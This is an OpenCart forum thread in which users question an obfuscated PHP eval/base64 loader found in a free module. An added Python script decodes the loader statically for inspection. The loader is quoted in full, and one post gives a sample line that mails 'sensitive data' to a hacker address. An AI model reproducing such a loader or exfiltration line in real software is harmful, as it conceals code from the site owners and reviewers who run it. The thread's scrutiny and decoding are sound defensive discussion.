Post by JNeuhoff » Sun Nov 15, 2009 2:15 am

I was just downloading the latest Next And Previous Links module, only to see this strange secretive code in the admin/controller/module/nextprevlinks.php file:

Code:

<?php // Copyright 2009 - Alexander Goldberg - http://www.cubecartmodder.com
$OOO0O0O00=__FILE__;$OOO000000=urldecode('%61%68%36%73%62%65%68%71%6c%61%34%63%6f%5f%73%61%64');$OO00O0000=4380;$OOO0000O0=$OOO000000{4}.$OOO000000{9}.$OOO000000{3}.$OOO000000{5};$OOO0000O0.=$OOO000000{2}.$OOO000000{10}.$OOO000000{13}.$OOO000000{16};$OOO0000O0.=$OOO0000O0{3}.$OOO000000{11}.$OOO000000{12}.$OOO0000O0{7}.$OOO000000{5};$O0O0000O0='OOO0000O0';eval(($$O0O0000O0('aWYoITApJE8wMDBPME8wMD1mb3BlbigkT09PME8wTzAwLCdyYicpO2ZnZXRzKCRPMDAwTzBPMDAsMTAyNCk7ZmdldHMoJE8wMDBPME8wMCw0MDk2KTskT08wME8wME8wPShiYXNlNjRfZGVjb2RlKHN0cnRyKGZyZWFkKCRPMDAwTzBPMDAsNDQ4KSwnVUtJVk5kY0p5ODUwcWErOVc2c0xtUndBSG9wRmpDaERHWTdRWHhuYmZla1BnWmkvdk1PcjFTenRsRXVUM0I0Mj0nLCdBQkNERUZHSElKS0xNTk9QUVJTVFVWV1hZWmFiY2RlZmdoaWprbG1ub3BxcnN0dXZ3eHl6MDEyMzQ1Njc4OSsvJykpKTtldmFsKCRPTzAwTzAwTzApOw==')));return;?>
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
For all we know this code could be a trojan or a virus.

I think we should always use plain PHP code for contribution modules and not this kind of secretive stuff.

MHC Web Design
Override Engine * Integrated VQMod * Unused Images Manager * Instant Option Price Calculator * Number Option * Google Rich Snippets * Google Tag Manager * Export/Import Tool * SpamBot Buster



Post by Xsecrets » Sun Nov 15, 2009 4:07 am

Did you decode it to see what it was? I agree this very much looks like what malware authors use to obfuscate their code.

OpenCart commercial mods and development http://spotonsolutions.net
Layered Navigation
Shipment Tracking
Vehicle Year/Make/Model Filter
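
Added example (not part of the original thread and not the module author's code): a Python script that answers the question above statically. It rebuilds the function name the loader assembles and decodes the string passed to eval() into readable PHP, without executing anything. KEY, the index lists and STAGE1_B64 are copied from the loader line in the first post; encode_body and the sample payload are constructed here for illustration.

```python
import base64
import re
from urllib.parse import unquote

# Constants copied from the loader line quoted in the first post.
KEY = unquote('%61%68%36%73%62%65%68%71%6c%61%34%63%6f%5f%73%61%64')
STAGE1_B64 = (
    "aWYoITApJE8wMDBPME8wMD1mb3BlbigkT09PME8wTzAwLCdyYicpO2ZnZXRzKCRP"
    "MDAwTzBPMDAsMTAyNCk7ZmdldHMoJE8wMDBPME8wMCw0MDk2KTskT08wME8wME8w"
    "PShiYXNlNjRfZGVjb2RlKHN0cnRyKGZyZWFkKCRPMDAwTzBPMDAsNDQ4KSwnVUtJ"
    "Vk5kY0p5ODUwcWErOVc2c0xtUndBSG9wRmpDaERHWTdRWHhuYmZla1BnWmkvdk1P"
    "cjFTenRsRXVUM0I0Mj0nLCdBQkNERUZHSElKS0xNTk9QUVJTVFVWV1hZWmFiY2Rl"
    "ZmdoaWprbG1ub3BxcnN0dXZ3eHl6MDEyMzQ1Njc4OSsvJykpKTtldmFsKCRPTzAw"
    "TzAwTzApOw=="
)

def hidden_function_name() -> str:
    """Rebuild the function name the loader assembles from KEY offsets."""
    name = ''.join(KEY[i] for i in (4, 9, 3, 5, 2, 10, 13, 16))
    return name + name[3] + KEY[11] + KEY[12] + name[7] + KEY[5]

def stage1_source() -> str:
    """Decode the string handed to eval() into PHP text (never executed)."""
    return base64.b64decode(STAGE1_B64).decode('ascii')

def body_parameters(php: str):
    """Return (bytes read, scrambled alphabet, target alphabet) from stage 1."""
    m = re.search(r"strtr\(fread\(\$\w+,(\d+)\),'([^']+)','([^']+)'\)", php)
    return int(m.group(1)), m.group(2), m.group(3)

def decode_body(blob: str, src: str, dst: str) -> bytes:
    """Python equivalent of base64_decode(strtr($blob, $src, $dst))."""
    n = min(len(src), len(dst))  # PHP strtr ignores the longer string's tail
    return base64.b64decode(blob.translate(str.maketrans(src[:n], dst[:n])))

def encode_body(plain: bytes, src: str, dst: str) -> str:
    """Inverse of decode_body; used only to build the constructed sample."""
    n = min(len(src), len(dst))
    b64 = base64.b64encode(plain).decode('ascii')
    return b64.translate(str.maketrans(dst[:n], src[:n]))

if __name__ == '__main__':
    print(hidden_function_name())
    print(stage1_source())
    size, src, dst = body_parameters(stage1_source())
    sample = encode_body(b"<?php echo 'constructed sample'; ?>", src, dst)
    print(size, decode_body(sample, src, dst))
```

The decoded first stage shows the loader skipping the file's first two lines and reading 448 bytes of the body; passing those bytes to decode_body yields the next stage as text that can be read instead of evaluated.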



Post by TBT » Sun Nov 15, 2009 11:27 pm

I would like to use this feature, but I am reluctant to use it as I have no idea what this code could be and class that as a security risk :(

Can anyone shed some light on this?



Post by Daniel » Mon Nov 16, 2009 1:36 am

Just comment the code out.

OpenCart®
Project Owner & Developer.



Post by Qphoria » Mon Nov 16, 2009 1:38 am

That's the whole module. You can't comment it out.


Post by Goober » Mon Nov 16, 2009 5:31 am

Hi,

This is not trojan code or malware or anything of the sort. It is simply encrypted PHP code.

The author is reluctant to share the code for the module in clear text. This encryption is done via one of the PHP code encryptors such as ioncube and the like.

Thanks
/Goober

OpenCart modules and custom programming
Please visit site and store www.opencartmods.com
Demo Site



Post by Xsecrets » Mon Nov 16, 2009 5:37 am

If he is giving it away in the free contributions section I don't understand the need to encode it, besides the description does not mention needing ioncube or zend accelerator or anything like it which you would have to have to use the code. If you ask me this is just pretty lame all the way around. I could almost see it if it was a paid module even though I personally want to see the code and be able to modify the code on anything I pay for, but on a free module it makes no sense.


Post by Qphoria » Mon Nov 16, 2009 6:30 am

Goober wrote:
Hi,

This is not trojan code or malware or anything of the sort. It is simply encrypted PHP code.

The author is reluctant to share the code for the module in clear text. This encryption is done via one of PHP code encryptors such as ioncube and the like.

Thanks
/Goober

We know it's encrypted PHP... but some of the encrypted PHP could be
mail(hacker@mail.com, 'sensitive data', 'xxxxxxxx')

So it could very well be a trojan or other malicious code.


Post by digitalchaos » Mon Nov 16, 2009 12:46 pm

Just a thought? but couldn't someone just rewrite a new version and solve this problem ;D

The most terrifying words in the English language are: I'm from the government and I'm here to help.
Ronald Reagan

Digital Chaos | Graphic Design Studio http://www.digitalchaos.biz
Digital Chaos Prints | Custom Art Prints http://www.digitalchaosprints.biz



Post by Qphoria » Mon Nov 16, 2009 1:08 pm

ok go ahead :)


Post by JNeuhoff » Mon Nov 16, 2009 9:43 pm

Shouldn't contributions be compatible with the GPL-license? I don't think this module is.



Post by Xsecrets » Mon Nov 16, 2009 10:21 pm

Well, there is no question this module is not compatible with the GPL, but if it doesn't change any code at all then it would not be considered a derivative work. I do not however believe that modules that are not open source should be allowed in the contributions section on this site. Just my opinion.


Post by Qphoria » Mon Nov 16, 2009 11:15 pm

All licensing aside... just from a user point of view... I wouldn't use an obfuscated server-side script that has access to carnal knowledge of sensitive data.
